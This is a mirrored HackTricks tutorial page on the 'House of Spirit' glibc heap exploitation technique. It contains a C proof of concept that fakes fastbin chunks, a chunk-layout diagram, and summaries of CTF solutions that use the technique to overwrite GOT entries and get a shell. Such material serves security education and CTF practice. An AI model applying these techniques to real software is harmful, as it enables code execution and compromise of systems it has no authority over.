mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-02 00:08:49 +00:00
145 lines
6.8 KiB
Markdown
145 lines
6.8 KiB
Markdown
|
# House of Spirit
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## Basic Information
|
||
|
|
||
|
### Code
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>House of Spirit</summary>
|
||
|
|
||
|
```c
|
||
|
#include <unistd.h>
|
||
|
#include <stdlib.h>
|
||
|
#include <string.h>
|
||
|
#include <stdio.h>
|
||
|
|
||
|
// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
|
||
|
|
||
|
struct fast_chunk {
|
||
|
size_t prev_size;
|
||
|
size_t size;
|
||
|
struct fast_chunk *fd;
|
||
|
struct fast_chunk *bk;
|
||
|
char buf[0x20]; // chunk falls in fastbin size range
|
||
|
};
|
||
|
|
||
|
int main() {
|
||
|
struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory
|
||
|
void *ptr, *victim;
|
||
|
|
||
|
ptr = malloc(0x30);
|
||
|
|
||
|
printf("Original alloc address: %p\n", ptr);
|
||
|
printf("Main fake chunk:%p\n", &fake_chunks[0]);
|
||
|
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
|
||
|
|
||
|
// Passes size check of "free(): invalid size"
|
||
|
fake_chunks[0].size = sizeof(struct fast_chunk);
|
||
|
|
||
|
// Passes "free(): invalid next size (fast)"
|
||
|
fake_chunks[1].size = sizeof(struct fast_chunk);
|
||
|
|
||
|
// Attacker overwrites a pointer that is about to be 'freed'
|
||
|
// Point to .fd as it's the start of the content of the chunk
|
||
|
ptr = (void *)&fake_chunks[0].fd;
|
||
|
|
||
|
free(ptr);
|
||
|
|
||
|
victim = malloc(0x30);
|
||
|
printf("Victim: %p\n", victim);
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
|
||
|
</details>
|
||
|
|
||
|
### Goal
|
||
|
|
||
|
* Be able to add into the tcache / fast bin an address so later it's possible to allocate it
|
||
|
|
||
|
### Requirements
|
||
|
|
||
|
* This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and then to be able to free the first fake chunk so it gets into the bin.
|
||
|
|
||
|
### Attack
|
||
|
|
||
|
* Create fake chunks that bypasses security checks: you will need 2 fake chunks basically indicating in the correct positions the correct sizes
|
||
|
* Somehow manage to free the first fake chunk so it gets into the fast or tcache bin and then it's allocate it to overwrite that address
|
||
|
|
||
|
**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **is great to understand the attack.** Although this schema from the code summarises it pretty good:
|
||
|
|
||
|
```c
|
||
|
/*
|
||
|
this will be the structure of our two fake chunks:
|
||
|
assuming that you compiled it for x64
|
||
|
|
||
|
+-------+---------------------+------+
|
||
|
| 0x00: | Chunk # 0 prev size | 0x00 |
|
||
|
+-------+---------------------+------+
|
||
|
| 0x08: | Chunk # 0 size | 0x60 |
|
||
|
+-------+---------------------+------+
|
||
|
| 0x10: | Chunk # 0 content | 0x00 |
|
||
|
+-------+---------------------+------+
|
||
|
| 0x60: | Chunk # 1 prev size | 0x00 |
|
||
|
+-------+---------------------+------+
|
||
|
| 0x68: | Chunk # 1 size | 0x40 |
|
||
|
+-------+---------------------+------+
|
||
|
| 0x70: | Chunk # 1 content | 0x00 |
|
||
|
+-------+---------------------+------+
|
||
|
|
||
|
for what we are doing the prev size values don't matter too much
|
||
|
the important thing is the size values of the heap headers for our fake chunks
|
||
|
*/
|
||
|
```
|
||
|
|
||
|
{% hint style="info" %}
|
||
|
Note that it's necessary to create the second chunk in order to bypass some sanity checks.
|
||
|
{% endhint %}
|
||
|
|
||
|
## Examples
|
||
|
|
||
|
* **CTF** [**https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html**](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
|
||
|
* **Libc infoleak**: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF
|
||
|
* **House of Spirit**: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing an overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address to system.\
|
||
|
Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell.
|
||
|
|
||
|
* [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
|
||
|
* **Glibc leak**: Uninitialized stack buffer.
|
||
|
* **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get an overlapping chunks situation after allocating again. With that, a simple Tcache poisoning attack works to get an arbitrary write primitive.
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|